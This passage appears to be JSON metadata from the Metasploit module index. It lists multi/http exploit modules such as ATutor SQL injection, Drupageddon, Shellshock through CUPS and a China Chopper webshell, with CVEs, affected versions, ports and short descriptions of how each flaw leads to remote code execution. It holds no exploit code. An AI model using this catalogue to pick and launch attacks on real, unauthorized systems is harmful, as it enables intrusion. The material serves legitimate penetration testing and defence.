"name": "ATutor 2.2.1 SQL Injection / Remote Code Execution",
"full_name": "exploit/multi/http/atutor_sqli",
"rank": 600,
"disclosure_date": "2016-03-01",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a SQL Injection vulnerability and an authentication weakness\n vulnerability in ATutor. This essentially means an attacker can bypass authentication\n and reach the administrator's interface where they can upload malicious code.",
"references": [
"CVE-2016-2555",
"URL-http://www.atutor.ca/",
"URL-http://sourceincite.com/research/src-2016-08/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/atutor_sqli.rb",
"is_install_path": true,
"ref_name": "multi/http/atutor_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/auxilium_upload_exec": {
"name": "Auxilium RateMyPet Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/auxilium_upload_exec",
"rank": 600,
"disclosure_date": "2012-09-14",
"type": "exploit",
"author": [
"DaOne",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Auxilium RateMyPet's. The site\n banner uploading feature can be abused to upload an arbitrary file to the web\n server, which is accessible in the 'banner' directory, thus allowing remote code\n execution.",
"references": [
"OSVDB-85554",
"EDB-21329"
],
"platform": "Linux,PHP",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/auxilium_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/auxilium_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/axis2_deployer": {
"name": "Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)",
"full_name": "exploit/multi/http/axis2_deployer",
"rank": 600,
"disclosure_date": "2010-12-30",
"type": "exploit",
"author": [
"Joshua Abraham <jabra@rapid7.com>",
"Chris John Riley"
],
"description": "This module logs in to an Axis2 Web Admin Module instance using a specific user/pass\n and uploads and executes commands via deploying a malicious web service by using SOAP.",
"references": [
"URL-http://www.rapid7.com/security-center/advisories/R7-0037.jsp",
"URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf",
"CVE-2010-0219",
"OSVDB-68662"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java",
"Windows Universal",
"Linux X86"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/multi/http/axis2_deployer.rb",
"is_install_path": true,
"ref_name": "multi/http/axis2_deployer",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/bassmaster_js_injection": {
"name": "Bassmaster Batch Arbitrary JavaScript Injection Remote Code Execution",
"full_name": "exploit/multi/http/bassmaster_js_injection",
"rank": 600,
"disclosure_date": "2016-11-01",
"type": "exploit",
"author": [
"mr_me <mr_me@offensive-security.com>",
"Jarda Kotesovec"
],
"description": "This module exploits an un-authenticated code injection vulnerability in the bassmaster\n nodejs plugin for hapi. The vulnerability is within the batch endpoint and allows an\n attacker to dynamically execute JavaScript code on the server side using an eval.\n\n Note that the code uses a '\\x2f' character so that we hit the match on the regex.",
"references": [
"CVE-2014-7205",
"URL-https://nodesecurity.io/advisories/bassmaster_js_injection"
],
"platform": "BSD,Linux",
"arch": "x86, x64",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Bassmaster <= 1.5.1"
],
"mod_time": "2017-12-18 03:55:01 +0000",
"path": "/modules/exploits/multi/http/bassmaster_js_injection.rb",
"is_install_path": true,
"ref_name": "multi/http/bassmaster_js_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/bolt_file_upload": {
"name": "CMS Bolt File Upload Vulnerability",
"full_name": "exploit/multi/http/bolt_file_upload",
"rank": 600,
"disclosure_date": "2015-08-17",
"type": "exploit",
"author": [
"Tim Coen",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "Bolt CMS contains a flaw that allows an authenticated remote\n attacker to execute arbitrary PHP code. This module was\n tested on version 2.2.4.",
"references": [
"CVE-2015-7309",
"URL-http://blog.curesec.com/article/blog/Bolt-224-Code-Execution-44.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Bolt 2.2.4"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/bolt_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/bolt_file_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/builderengine_upload_exec": {
"name": "BuilderEngine Arbitrary File Upload Vulnerability and execution",
"full_name": "exploit/multi/http/builderengine_upload_exec",
"rank": 600,
"disclosure_date": "2016-09-18",
"type": "exploit",
"author": [
"metanubix",
"Marco Rivoli"
],
"description": "This module exploits a vulnerability found in BuilderEngine 3.5.0\n via elFinder 2.0. The jquery-file-upload plugin can be abused to upload a malicious\n file, which would result in arbitrary remote code execution under the context of\n the web server.",
"references": [
"EDB-40390"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"BuilderEngine 3.5.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/builderengine_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/builderengine_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/caidao_php_backdoor_exec": {
"name": "China Chopper Caidao PHP Backdoor Code Execution",
"full_name": "exploit/multi/http/caidao_php_backdoor_exec",
"rank": 600,
"disclosure_date": "2015-10-27",
"type": "exploit",
"author": [
"Nixawk"
],
"description": "This module takes advantage of the China Chopper Webshell that is\n commonly used by Chinese hackers.",
"references": [
"URL-https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
"URL-https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html",
"URL-https://www.exploit-db.com/docs/27654.pdf",
"URL-https://www.us-cert.gov/ncas/alerts/TA15-313A"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/caidao_php_backdoor_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/caidao_php_backdoor_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/cisco_dcnm_upload": {
"name": "Cisco Prime Data Center Network Manager Arbitrary File Upload",
"full_name": "exploit/multi/http/cisco_dcnm_upload",
"rank": 600,
"disclosure_date": "2013-09-18",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in Cisco Data Center Network Manager. The\n vulnerability exists in processImageSave.jsp, which can be abused through a directory\n traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss\n application server feature is used to achieve remote code execution. This module has been\n tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2\n (64 bits).",
"references": [
"CVE-2013-5486",
"OSVDB-97426",
"ZDI-13-254",
"URL-http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm"
],
"platform": "Java",
"arch": "java",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Cisco DCNM 6.1(2) / Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/cisco_dcnm_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/cisco_dcnm_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/clipbucket_fileupload_exec": {
"name": "ClipBucket beats_uploader Unauthenticated Arbitrary File Upload",
"full_name": "exploit/multi/http/clipbucket_fileupload_exec",
"rank": 600,
"disclosure_date": "2018-03-03",
"type": "exploit",
"author": [
"www.sec-consult.com",
"Touhid M.Shaikh <admin@touhidshaikh.com>"
],
"description": "This module exploits a vulnerability found in ClipBucket versions before 4.0.0 (Release 4902).\n A malicious file can be uploaded using an unauthenticated arbitrary file upload vulnerability.\n It is possible for an attacker to upload a malicious script to issue operating system commands.\n This issue is caused by improper session handling in /action/beats_uploader.php file.\n This module was tested on ClipBucket before 4.0.0 - Release 4902 on Windows 7 and Kali Linux.",
"references": [
"CVE-2018-7665",
"EDB-44250"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Clipbucket < 4.0.0 - Release 4902"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/clipbucket_fileupload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/clipbucket_fileupload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/cmsms_showtime2_rce": {
"name": "CMS Made Simple (CMSMS) Showtime2 File Upload RCE",
"full_name": "exploit/multi/http/cmsms_showtime2_rce",
"rank": 300,
"disclosure_date": "2019-03-11",
"type": "exploit",
"author": [
"Daniele Scanu",
"Fabio Cogno"
],
"description": "This module exploits a File Upload vulnerability that lead in a RCE in\n Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated\n user with \"Use Showtime2\" privilege could exploit the vulnerability.\n\n The vulnerability exists in the Showtime2 module, where the class\n \"class.showtime2_image.php\" does not ensure that a watermark file\n has a standard image file extension (GIF, JPG, JPEG, or PNG).\n\n Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0,\n 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1",
"references": [
"CVE-2019-9692",
"CWE-434",
"EDB-46546",
"URL-https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285",
"URL-http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2019-03-27 15:17:32 +0000",
"path": "/modules/exploits/multi/http/cmsms_showtime2_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/cmsms_showtime2_rce",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/cmsms_upload_rename_rce": {
"name": "CMS Made Simple Authenticated RCE via File Upload/Copy",
"full_name": "exploit/multi/http/cmsms_upload_rename_rce",
"rank": 600,
"disclosure_date": "2018-07-03",
"type": "exploit",
"author": [
"Mustafa Hasen",
"Jacob Robles"
],
"description": "CMS Made Simple allows an authenticated administrator to upload a file\n and rename it to have a .php extension. The file can then be executed\n by opening the URL of the file in the /uploads/ directory.\n\n This module has been successfully tested on CMS Made Simple versions\n 2.2.5 and 2.2.7.",
"references": [
"CVE-2018-1000094",
"CWE-434",
"EDB-44976",
"URL-http://dev.cmsmadesimple.org/bug/view/11741"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal"
],
"mod_time": "2018-07-31 10:03:59 +0000",
"path": "/modules/exploits/multi/http/cmsms_upload_rename_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/cmsms_upload_rename_rce",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/coldfusion_ckeditor_file_upload": {
"name": "Adobe ColdFusion CKEditor unrestricted file upload",
"full_name": "exploit/multi/http/coldfusion_ckeditor_file_upload",
"rank": 600,
"disclosure_date": "2018-09-11",
"type": "exploit",
"author": [
"Pete Freitag de Foundeo",
"Vahagn vah_13 Vardanian",
"Qazeer"
],
"description": "A file upload vulnerability in the CKEditor of Adobe ColdFusion 11\n (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and\n ColdFusion 2018 (July 12 release) allows unauthenticated remote\n attackers to upload and execute JSP files through the filemanager\n plugin.\n Tested on Adobe ColdFusion 2018.0.0.310739.",
"references": [
"CVE-2018-15961",
"BID-105314",
"URL-https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html"
],
"platform": "Linux,Windows",
"arch": "java",
"rport": 8500,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal"
],
"mod_time": "2019-01-10 06:39:45 +0000",
"path": "/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/coldfusion_ckeditor_file_upload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/coldfusion_rds": {
"name": "Adobe ColdFusion 9 Administrative Login Bypass",
"full_name": "exploit/multi/http/coldfusion_rds",
"rank": 500,
"disclosure_date": "2013-08-08",
"type": "exploit",
"author": [
"Scott Buckel",
"Mekanismen <mattias@gotroot.eu>"
],
"description": "Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote\n attackers to bypass authentication using the RDS component. Due to\n default settings or misconfiguration, its password can be set to an\n empty value. This allows an attacker to create a session via the RDS\n login that can be carried over to the admin web interface even though\n the passwords might be different, and therefore bypassing authentication\n on the admin web interface leading to arbitrary code execution. Tested\n on Windows and Linux with ColdFusion 9.",
"references": [
"CVE-2013-0632",
"EDB-27755",
"URL-http://www.adobe.com/support/security/bulletins/apsb13-03.html"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/coldfusion_rds.rb",
"is_install_path": true,
"ref_name": "multi/http/coldfusion_rds",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/confluence_widget_connector": {
"name": "Atlassian Confluence Widget Connector Macro Velocity Template Injection",
"full_name": "exploit/multi/http/confluence_widget_connector",
"rank": 600,
"disclosure_date": "2019-03-25",
"type": "exploit",
"author": [
"Daniil Dmitriev",
"Dmitry (rrock) Shchannikov"
],
"description": "Widget Connector Macro is part of Atlassian Confluence Server and Data Center that\n allows embed online videos, slideshows, photostreams and more directly into page.\n A _template parameter can be used to inject remote Java code into a Velocity template,\n and gain code execution. Authentication is unrequired to exploit this vulnerability.\n By default, Java payload will be used because it is cross-platform, but you can also\n specify which native payload you want (Linux or Windows).\n\n Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\n 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\n\n This vulnerability was originally discovered by Daniil Dmitriev\n https://twitter.com/ddv_ua.",
"references": [
"CVE-2019-3396",
"URL-https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html",
"URL-https://chybeta.github.io/2019/04/06/Analysis-for-%E3%80%90CVE-2019-3396%E3%80%91-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/",
"URL-https://paper.seebug.org/886/"
],
"platform": "",
"arch": "",
"rport": 8090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java",
"Windows",
"Linux"
],
"mod_time": "2019-04-19 12:35:36 +0000",
"path": "/modules/exploits/multi/http/confluence_widget_connector.rb",
"is_install_path": true,
"ref_name": "multi/http/confluence_widget_connector",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/cups_bash_env_exec": {
"name": "CUPS Filter Bash Environment Variable Code Injection (Shellshock)",
"full_name": "exploit/multi/http/cups_bash_env_exec",
"rank": 600,
"disclosure_date": "2014-09-24",
"type": "exploit",
"author": [
"Stephane Chazelas",
"lcamtuf",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets CUPS filters through\n the PRINTER_INFO and PRINTER_LOCATION variables. A valid username and password is\n required to exploit this vulnerability through CUPS.",
"references": [
"CVE-2014-6271",
"CVE-2014-6278",
"CWE-94",
"OSVDB-112004",
"EDB-34765",
"URL-https://access.redhat.com/articles/1200223",
"URL-https://seclists.org/oss-sec/2014/q3/649"
],
"platform": "Unix",
"arch": "cmd",
"rport": 631,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/cups_bash_env_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/cups_bash_env_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"exploit_multi/http/cuteflow_upload_exec": {
"name": "CuteFlow v2.11.2 Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/cuteflow_upload_exec",
"rank": 600,
"disclosure_date": "2012-07-27",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in CuteFlow version 2.11.2 or prior.\n This application has an upload feature that allows an unauthenticated\n user to upload arbitrary files to the 'upload/___1/' directory\n and then execute it.",
"references": [
"URL-http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/",
"OSVDB-84829"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/cuteflow_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/cuteflow_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/dexter_casinoloader_exec": {
"name": "Dexter (CasinoLoader) SQL Injection",
"full_name": "exploit/multi/http/dexter_casinoloader_exec",
"rank": 600,
"disclosure_date": "2014-02-08",
"type": "exploit",
"author": [
"bwall (Brian Wallace) <bwallace@cylance.com>"
],
"description": "This module exploits a vulnerability found in the command and control panel\n used to control Dexter (Point of Sale malware). This is done by accessing the\n PHP page used by bots to report in (gateway.php) which does not sanitize input.\n Input is encrypted and encoded, but the key is supplied by the bot connecting.\n The 'page' parameter is used in this case. The command and control panel designates\n a location to upload files, and can be used as a reliable location to write a\n PHP shell. Authentication is not needed to exploit this vulnerability.",
"references": [
"URL-http://www.xylibox.com/2013/08/point-of-sale-malware-infostealerdexter.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CasinoLoader gateway.php"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/dexter_casinoloader_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/dexter_casinoloader_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/drupal_drupageddon": {
"name": "Drupal HTTP Parameter Key/Value SQL Injection",
"full_name": "exploit/multi/http/drupal_drupageddon",
"rank": 600,
"disclosure_date": "2014-10-15",
"type": "exploit",
"author": [
"SektionEins",
"WhiteWinterWolf",
"Christian Mehlmauer <FireFart@gmail.com>",
"Brandon Perry"
],
"description": "This module exploits the Drupal HTTP Parameter Key/Value SQL Injection\n (aka Drupageddon) in order to achieve a remote shell on the vulnerable\n instance. This module was tested against Drupal 7.0 and 7.31 (was fixed\n in 7.32).\n\n Two methods are available to trigger the PHP payload on the target:\n\n - set TARGET 0:\n Form-cache PHP injection method (default).\n This uses the SQLi to upload a malicious form to Drupal's cache,\n then trigger the cache entry to execute the payload using a POP chain.\n\n - set TARGET 1:\n User-post injection method.\n This creates a new Drupal user, adds it to the administrators group,\n enable Drupal's PHP module, grant the administrators the right to\n bundle PHP code in their post, create a new post containing the\n payload and preview it to trigger the payload execution.",
"references": [
"CVE-2014-3704",
"URL-https://www.drupal.org/SA-CORE-2014-005",
"URL-http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html",
"URL-https://www.whitewinterwolf.com/posts/2017/11/16/drupageddon-revisited-a-new-path-from-sql-injection-to-remote-command-execution-cve-2014-3704/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Drupal 7.0 - 7.31 (form-cache PHP injection method)",
"Drupal 7.0 - 7.31 (user-post PHP injection method)"
],
"mod_time": "2018-01-03 23:10:16 +0000",
"path": "/modules/exploits/multi/http/drupal_drupageddon.rb",
"is_install_path": true,
"ref_name": "multi/http/drupal_drupageddon",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/eaton_nsm_code_exec": {
"name": "Network Shutdown Module (sort_values) Remote PHP Code Injection",
"full_name": "exploit/multi/http/eaton_nsm_code_exec",
"rank": 600,
"disclosure_date": "2012-06-26",
"type": "exploit",
"author": [
"h0ng10",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Eaton Network Shutdown Module\n version <= 3.21, in lib/dbtools.inc which uses unsanitized user input\n inside a eval() call. Additionally the base64 encoded user credentials\n are extracted from the database of the application. Please note that\n in order to be able to steal credentials, the vulnerable service must\n have at least one USV module (an entry in the \"nodes\" table in\n mgedb.db)",
"references": [
"OSVDB-83199",
"URL-http://secunia.com/advisories/49103/"
],
"platform": "Linux,PHP",
"arch": "php",
"rport": 4679,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/eaton_nsm_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/eaton_nsm_code_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/eventlog_file_upload": {
"name": "ManageEngine Eventlog Analyzer Arbitrary File Upload",
"full_name": "exploit/multi/http/eventlog_file_upload",
"rank": 600,
"disclosure_date": "2014-08-31",
"type": "exploit",
"author": [
"h0ng10",
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer.\n The vulnerability exists in the agentUpload servlet which accepts unauthenticated\n file uploads and handles zip file contents in an insecure way. By combining both\n weaknesses a remote attacker can achieve remote code execution. This module has been\n tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions\n between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server,\n while versions 8.1+ are only exploitable via a JSP upload.",
"references": [
"CVE-2014-6037",
"OSVDB-110642",
"URL-https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt",
"URL-https://seclists.org/fulldisclosure/2014/Aug/86"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8400,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Eventlog Analyzer v7.0 - v8.0 / Java universal",
"Eventlog Analyzer v8.1 - v9.9 b9002 / Windows",
"Eventlog Analyzer v8.1 - v9.9 b9002 / Linux"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/eventlog_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/eventlog_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/extplorer_upload_exec": {
"name": "eXtplorer v2.1 Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/extplorer_upload_exec",
"rank": 600,
"disclosure_date": "2012-12-31",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an authentication bypass vulnerability in eXtplorer\n versions 2.1.0 to 2.1.2 and 2.1.0RC5 when run as a standalone application.\n This application has an upload feature that allows an authenticated user\n with administrator roles to upload arbitrary files to any writable\n directory in the web root. This module uses an authentication bypass\n vulnerability to upload and execute a file.",
"references": [
"OSVDB-88751",
"BID-57058",
"URL-http://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability",
"URL-http://extplorer.net/issues/105"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/extplorer_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/extplorer_upload_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/familycms_less_exec": {
"name": "Family Connections less.php Remote Command Execution",
"full_name": "exploit/multi/http/familycms_less_exec",
"rank": 600,
"disclosure_date": "2011-11-29",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an arbitrary command execution vulnerability in\n Family Connections 2.7.1. It's in the dev/less.php script and is due\n to an insecure use of system(). Authentication isn't required to exploit\n the vulnerability but register_globals must be set to On.",
"references": [
"CVE-2011-5130",
"OSVDB-77492",
"URL-https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/",
"URL-http://sourceforge.net/apps/trac/fam-connections/ticket/407",
"URL-http://rwx.biz.nf/advisories/fc_cms_rce_adv.html",
"EDB-18198"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/familycms_less_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/familycms_less_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/freenas_exec_raw": {
"name": "FreeNAS exec_raw.php Arbitrary Command Execution",
"full_name": "exploit/multi/http/freenas_exec_raw",
"rank": 500,
"disclosure_date": "2010-11-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits an arbitrary command execution flaw\n in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL\n to the exec_raw.php page, an attacker may be able to execute arbitrary\n commands.\n\n NOTE: This module works best with php/meterpreter payloads.",
"references": [
"OSVDB-94441",
"URL-http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/freenas_exec_raw.rb",
"is_install_path": true,
"ref_name": "multi/http/freenas_exec_raw",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/gestioip_exec": {
"name": "GestioIP Remote Command Execution",
"full_name": "exploit/multi/http/gestioip_exec",
"rank": 600,
"disclosure_date": "2013-10-04",
"type": "exploit",
"author": [
"bperry"
],
"description": "This module exploits a command injection flaw to create a shell script\n on the filesystem and execute it. If GestioIP is configured to use no authentication,\n no password is required to exploit the vulnerability. Otherwise, an authenticated\n user is required to exploit.",
"references": [
"URL-http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/",
"URL-https://github.com/rapid7/metasploit-framework/pull/2461",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
